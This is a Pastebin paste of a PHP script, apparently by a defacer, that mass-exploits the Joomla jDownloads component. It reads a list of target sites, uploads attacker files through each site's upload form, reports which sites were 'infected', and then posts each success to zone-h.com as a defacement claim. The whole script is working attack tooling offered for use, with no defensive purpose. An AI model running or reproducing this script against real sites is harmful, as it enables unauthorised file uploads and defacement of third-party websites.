Advertisement
AngrY_DefaceR

jdownloads

Sep 7th, 2016
186
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 2.45 KB | None | 0 0
  1. <?php
  2.  @set_time_limit(0);
  3.    print"
  4.  _     _                     _                 _
  5. (_) __| | _____      ___ __ | | ___   __ _  __| |___
  6. | |/ _` |/ _ \ \ /\ / / '_ \| |/ _ \ / _` |/ _` / __|
  7. | | (_| | (_) \ V  V /| | | | | (_) | (_| | (_| \__ \
  8. _/ |\__,_|\___/ \_/\_/ |_| |_|_|\___/ \__,_|\__,_|___/
  9. |__/                 AngrY_DefaceR
  10.  
  11.  ";
  12.  
  13.  
  14. echo "\n";
  15.  
  16. echo "\t url list of sites : ";$x=trim(fgets(STDIN,1024));
  17.  
  18.     echo "\n";
  19.  
  20. $get=@file_get_contents($x);
  21. $ex=explode("\r\n",$get);
  22. foreach($ex as $mag){
  23.     echo "\t[+] scannign -->".$mag;
  24.     echo jd($mag);
  25. }
  26. function jd($url){
  27.  
  28.      $file1='x.zip';
  29.      $file2='x.gif';
  30.  
  31.      $bbb='/index.php?option=com_jdownloads&Itemid=0&view=upload';
  32.      $sco=($url).($bbb);
  33.  
  34.         $post=array(
  35.     'name'=>'ur name','mail'=>'blackwolf_cw@hotmail.com','catlist'=>'1','file_upload'=>"@$file1",'filetitle' =>"lolz",
  36.     'description'=>"<p>zot</p>" ,'2d1a8f3bd0b5cf542e9312d74fc9766f'=>1,
  37.     'send'=>1,'senden'=>"Send file", 'description'=>"<p>qsdqsdqsdqsdqsdqsdqsd</p>",
  38.     'option'=>"com_jdownloads",'view'=>"upload",'pic_upload'=>"@$file2"
  39.     );
  40.         $ch = curl_init ($sco);
  41.         curl_setopt ($ch, CURLOPT_RETURNTRANSFER, TRUE);
  42.         curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, TRUE);
  43.         curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT,3 );
  44.         curl_setopt ($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.94 Safari/537.36");
  45.         curl_setopt ($ch, CURLOPT_POST, TRUE);
  46.         curl_setopt ($ch, CURLOPT_POSTFIELDS, $post);
  47.         $data = curl_exec ($ch);
  48.  
  49.         curl_close ($ch);
  50.     $path='/images/jdownloads/screenshots/';
  51.     $final=($url).($path).($file2);
  52.     if(eregi('The file was successfully transferred to the server!',$data)or preg_match("/color=\"green\">/",$data)){
  53.       echo "\n\t\t".'yes -->'.$final."\n";
  54.  
  55.           $ch = curl_init ("http://www.zone-h.com/notify/single");
  56.     curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
  57.     curl_setopt ($ch, CURLOPT_POST, 1);
  58.         curl_setopt ($ch, CURLOPT_POSTFIELDS, "defacer=Must@f@&domain1=$final&hackmode=1&reason=1");
  59.         if (preg_match ("/color=\"red\">OK<\/font><\/li>/i", curl_exec ($ch))){
  60.                 echo  "\t\tZone-h --> Ok  ". "\n\n";
  61.         }else{
  62.                 echo "\t\tZone-h --> No". "\n\n"; }
  63.     curl_close ($ch);
  64.  
  65.  
  66.     }else{
  67.       echo "\n\t\t".$url." --> not infected \n\n";
  68.  
  69.  
  70.     }
  71.     }
  72.  
  73.  
  74. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement